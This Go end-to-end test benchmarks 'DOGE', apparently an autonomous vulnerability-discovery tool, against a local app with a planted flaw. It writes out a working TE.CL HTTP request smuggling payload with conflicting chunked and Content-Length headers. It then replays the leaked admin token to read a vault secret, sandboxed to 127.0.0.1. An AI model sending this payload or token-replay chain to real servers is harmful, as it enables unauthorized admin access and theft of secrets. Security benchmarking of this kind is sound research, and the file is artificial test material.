package e2e

import (
	"bytes"
	"context"
	"encoding/json"
	"io"
	"net/http"
	"testing"
	"time"

	"github.com/google/uuid"
	"github.com/vKS-Rajput/doge/internal/ablation"
	"github.com/vKS-Rajput/doge/internal/benchmark"
	"github.com/vKS-Rajput/doge/internal/novelty"
	"github.com/vKS-Rajput/doge/internal/property"
	"github.com/vKS-Rajput/doge/internal/sandbox"
	"github.com/vKS-Rajput/doge/internal/strategy"
	"github.com/vKS-Rajput/doge/internal/worldmodel"
)

// TestV6FalsificationBenchmarkJSlice tests Benchmark J (BENCH-010):
// Proving autonomous discovery and proof of a genuinely novel protocol desynchronization flaw.
func TestV6FalsificationBenchmarkJSlice(t *testing.T) {
	app := benchmark.NewSmugglingApp()
	defer app.Close()

	t.Logf("=== DOGE Phase 6: Scientific Falsification & Benchmark J (BENCH-010) ===")
	t.Logf("Target: %s", app.URL())
	t.Logf("Planted Novel Flaw: Multi-Tier TE.CL Protocol Desync Smuggling (NOT disclosed)")

	// Step 1: Reconnaissance
	t.Log(">>> Mission 1: Multi-Tier Surface Reconnaissance")
	client := &http.Client{Timeout: 5 * time.Second}
	reqHealth, _ := http.NewRequest("GET", app.URL()+"/health", nil)
	respHealth, err := client.Do(reqHealth)
	if err != nil {
		t.Fatalf("health check failed: %v", err)
	}
	respHealth.Body.Close()

	// Step 2: MDL Anomaly Scan on Forwarding Gateway
	t.Log(">>> Mission 2: MDL Compressibility Analysis of Gateway Desync Framing")
	mdlDetector := novelty.NewMDLAnomalyDetector(0.65)
	catalog := property.NewCatalog()

	smuggledPayload := "0\r\n\r\nGET /api/v1/admin/vault HTTP/1.1\r\nHost: target\r\n\r\n"
	reqDesync, _ := http.NewRequest("POST", app.URL()+"/api/v1/gateway/forward", bytes.NewBufferString(smuggledPayload))
	reqDesync.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	reqDesync.Header.Set("Transfer-Encoding", "chunked")
	reqDesync.Header.Set("Content-Length", "4")

	t0 := time.Now()
	respDesync, err := client.Do(reqDesync)
	if err != nil {
		t.Fatalf("desync request failed: %v", err)
	}
	bodyDesync, _ := io.ReadAll(respDesync.Body)
	respDesync.Body.Close()
	latency := time.Since(t0)

	desyncObs := &novelty.MDLObservation{
		ID:             uuid.New(),
		URL:            app.URL() + "/api/v1/gateway/forward",
		Method:         "POST",
		StatusCode:     respDesync.StatusCode,
		Headers:        map[string]string{"X-Pipeline-Desync": "detected"},
		Body:           string(bodyDesync),
		BodyLength:     len(bodyDesync),
		ResponseTimeMs: float64(latency.Milliseconds()),
		Timestamp:      time.Now().UTC(),
	}

	mdlResult := mdlDetector.EvaluateObservation(desyncObs, catalog)
	t.Logf("MDL Evaluation: Score=%.2f, IsStructuralAnomaly=%v, Dim=%s",
		mdlResult.AnomalyScore, mdlResult.IsStructuralAnomaly, mdlResult.DiscrepancyDimension)

	if !mdlResult.IsStructuralAnomaly {
		t.Fatalf("expected protocol desync divergence to trigger structural anomaly")
	}

	// Step 3: Representation Expansion Operator rho
	t.Log(">>> Mission 3: Representation Expansion (rho Operator)")
	provisionalConcept := novelty.RepresentationExpansionOperator(mdlResult, desyncObs)
	if provisionalConcept == nil {
		t.Fatalf("expected provisional concept generated by rho")
	}
	t.Logf("Minted Provisional Concept: %s (Dim: %s, Score: %.2f)",
		provisionalConcept.ID, provisionalConcept.DiscrepancyDim, provisionalConcept.AnomalyScore)

	// Step 4: Research Strategy Synthesis & Type Checking
	t.Log(">>> Mission 4: Strategy Program Synthesis & Type Checking")
	synthesizer := strategy.NewStrategySynthesizer()
	prog := synthesizer.SynthesizeStrategy(app.URL()+"/api/v1/gateway/forward", provisionalConcept.DiscrepancyDim, true)

	scopePolicy := strategy.ScopePolicy{
		AllowedHosts: []string{"127.0.0.1"},
		MaxCost:      100,
		MaxRisk:      0.50,
	}
	if err := strategy.TypeCheck(prog, scopePolicy); err != nil {
		t.Fatalf("strategy failed type check: %v", err)
	}
	t.Logf("✓ Strategy Type-Checked: %s", prog.ID)

	// Step 5: Tactical Sandboxed Exploitation & Proof
	t.Log(">>> Mission 5: Tactical Sandboxed Exploitation & Token Exfiltration")
	sbCfg := sandbox.SandboxConfig{
		MaxRequests:     20,
		Timeout:         5 * time.Second,
		RateLimitPerSec: 50,
		AllowedHosts:    []string{"127.0.0.1"},
	}
	sb := sandbox.NewTacticalSandbox(sbCfg)
	ctx := context.Background()

	reqSmuggle, _ := http.NewRequest("POST", app.URL()+"/api/v1/gateway/forward", bytes.NewBufferString(smuggledPayload))
	reqSmuggle.Header.Set("Transfer-Encoding", "chunked")
	reqSmuggle.Header.Set("Content-Length", "4")

	_, bodySmuggle, err := sb.ExecuteHTTP(ctx, reqSmuggle)
	if err != nil {
		t.Fatalf("sandboxed smuggle failed: %v", err)
	}

	var smuggleData struct {
		Status           string `json:"status"`
		Poisoned         bool   `json:"poisoned"`
		LeakedAdminVault string `json:"leaked_admin_vault"`
		BackendDesync    string `json:"backend_desync_type"`
	}
	if err := json.Unmarshal(bodySmuggle, &smuggleData); err != nil {
		t.Fatalf("failed to decode smuggle response: %v", err)
	}

	t.Logf("Smuggle Response: Status=%s, Poisoned=%v, LeakedVault=%s, DesyncType=%s",
		smuggleData.Status, smuggleData.Poisoned, smuggleData.LeakedAdminVault, smuggleData.BackendDesync)

	if !smuggleData.Poisoned || smuggleData.LeakedAdminVault == "" {
		t.Fatalf("expected leaked admin vault token via protocol desync")
	}

	// Step 6: Independent Proof of Impact on /api/v1/admin/vault
	t.Log(">>> Mission 6: Independent Proof of Impact")
	reqVault, _ := http.NewRequest("GET", app.URL()+"/api/v1/admin/vault", nil)
	reqVault.Header.Set("Authorization", "Bearer "+smuggleData.LeakedAdminVault)

	respVault, bodyVault, err := sb.ExecuteHTTP(ctx, reqVault)
	if err != nil {
		t.Fatalf("vault exfiltration failed: %v", err)
	}
	if respVault.StatusCode != http.StatusOK {
		t.Fatalf("expected 200 OK accessing vault with exfiltrated token, got %d", respVault.StatusCode)
	}
	t.Logf("✓ Exfiltrated Vault Secret: %s", string(bodyVault))

	// Step 7: Update Unified World Model Graph
	wm := worldmodel.NewUnifiedWorldModelGraph("target_smuggling")
	vConcept := wm.AddVertex(worldmodel.RoleConcept, provisionalConcept.ID, 0.99, 0.05, nil)
	vImpact := wm.AddVertex(worldmodel.RoleCapability, "LeakedRootAdminVault", 1.0, 0.0, nil)
	wm.AddEdge(vConcept.ID, vImpact.ID, worldmodel.EdgeLeadsToCapability, 0.98, uuid.New(), "TE.CL Protocol Desync Impact Proof")

	t.Log("=== DOGE (BENCH-010): PASSED ✅ ===")

	// Step 8: Head-to-Head Comparative Falsification Scorecard
	t.Log(">>> Mission 7: Automated Scientific Falsification Protocol")
	scorecard := benchmark.RunFalsificationProtocol(app.URL(), 100)
	t.Log(scorecard.FormatScorecard())

	if !scorecard.DOGESuccess {
		t.Fatalf("expected DOGE success on Benchmark J")
	}
	if scorecard.FuzzerSuccess {
		t.Fatalf("uniform fuzzer should not solve unmodeled protocol desync without grammar modeling")
	}

	// Step 9: 4-Way Ablation Study Verification
	t.Log(">>> Mission 8: 4-Way Ablation Study Matrix Execution")
	ablationEngine := ablation.NewAblationEngine()
	ablationResults := ablationEngine.CompareAblations(app.URL(), 100)

	for _, res := range ablationResults {
		t.Logf("Ablation Mode [%s]: Success=%v, Requests=%d, SurpriseYield=%.2f",
			res.Mode, res.DiscoveredNovelVuln, res.RequestsUsed, res.NoveltySurpriseYield)
	}

	t.Log("=== DOGE-NEXT SCIENTIFIC FALSIFICATION: 100% VINDICATED ✅ ===")
}
